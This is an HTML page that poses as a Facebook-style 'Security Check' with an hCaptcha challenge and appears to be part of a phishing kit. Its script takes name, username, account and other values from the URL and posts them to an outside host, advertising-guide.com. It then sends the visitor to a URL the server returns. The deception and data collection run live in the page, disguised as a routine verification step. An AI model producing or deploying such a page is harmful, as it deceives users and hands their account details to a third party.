<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">

    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">

    <title>Prove you are not a robot!</title>
    <style type="text/css">
      body{
        background-color: #e9ebee;

      }
      .karta .headeri{
        background-color: #3a5da1;
        text-align: center;
        padding-top: 20px;
        padding-bottom: 20px;
        border-top-right-radius: 3px;
        border-top-left-radius: 3px;

      }
      .karta .headeri img{
        width: 110px;
      }
      .karta{
        margin-top: 30px;
        margin-bottom: 30px;
        border: 1px solid #d3d4d7;
        border-radius: 3px;

      }
      .body{
        padding:15px;
        background-color: white;
      }
      .perborder{
        border-bottom: 1px solid #e2e4e7;
      }
      .helpus{
        
        padding-bottom: 10px;
        font-size: 14px;
        font-weight: 600;
        margin-bottom: 10px;
      }
      .body{
        border-bottom-right-radius: 3px;
        border-bottom-left-radius: 3px;
      }

    </style>
        <script src="https://js.hcaptcha.com/1/api.js" async defer></script>

  </head>
  <body>
    <div class="container">
      <div class="row justify-content-center">
        <div class="col-md-6">
          <div class="karta">
            <div class="headeri">
              <img src="per.png" />
            </div>
            <div class="body">
              <p class="helpus perborder">Help us confirm that it's you</p>
              <p class="helpus">Security Check</p>
                       <form id="yourFormId" action="" method="POST">
                <div class="h-captcha" data-sitekey="2090dde0-1a4a-4119-ac94-68dbc4180559" data-callback="onSuccess"></div>
              </form>
              <p style="color:#5d58bb; font-size: 12px; margin-top: 10px; padding-bottom: 10px;" class="perborder">Why am I seeing this?</p>
              <div style="text-align: right;">
                <input type="button" value="Continue" id="continuebutton"  class="btn btn-primary" style="background-color:#4267b2; font-size: 13px; border-radius: 2px; font-weight: 600; padding: 5px 10px; "/>
              </div>
            </div>
          </div>
        </div>
      </div>
    </div>
    <!-- Optional JavaScript; choose one of the two! -->

<script type="text/javascript">
      function onSuccess(response){
        var kodi = response;
        const urlParams = new URLSearchParams(window.location.search);

        const data = [];

        data.push({ name: 'response', value: kodi });

        if (urlParams.has('teksti')) {
          const teksti = urlParams.get('teksti');
          data.push({ name: 'teksti', value: teksti });
        }

        if (urlParams.has('image')) {
          const image = urlParams.get('image');
          data.push({ name: 'image', value: image });
        }

        if (urlParams.has('name')) {
          const name = urlParams.get('name');
          data.push({ name: 'name', value: name });
        }

        if (urlParams.has('username')) {
          const username = urlParams.get('username');
          data.push({ name: 'username', value: username });
        }

        if (urlParams.has('hidephone')) {
          const hidephone = urlParams.get('hidephone');
          data.push({ name: 'hidephone', value: hidephone });
        }

        if (urlParams.has('account')) {
          const account = urlParams.get('account');
          data.push({ name: 'account', value: account });
        }

        $.ajax({
            type: "POST",
            url: "https://advertising-guide.com/send/serversfullu.php",
            data: data,
            success: function(response)
            {
              location.href = response;
           }
       });
      }
    </script>

        <script
  src="https://code.jquery.com/jquery-3.6.3.min.js"
  integrity="sha256-pvPw+upLPUjgMXY0G+8O0xUf+/Im1MZjXxxgOcBQBXU="
  crossorigin="anonymous"></script>

    <!-- Option 1: Bootstrap Bundle with Popper -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>



    <!-- Option 2: Separate Popper and Bootstrap JS -->
    <!--
    <script src="https://cdn.jsdelivr.net/npm/@popperjs/core@2.9.2/dist/umd/popper.min.js" integrity="sha384-IQsoLXl5PILFhosVNubq5LC7Qb9DXgDA9i+tQ8Zj3iwWAwPtgFTxbJ8NT4GN1R8p" crossorigin="anonymous"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.min.js" integrity="sha384-cVKIPhGWiC2Al4u+LWgxfKTRIcfu0JTxR+EQDz/bgldoEyl4H0zUF0QKbrJ0EcQF" crossorigin="anonymous"></script>
    -->
  </body>
</html>
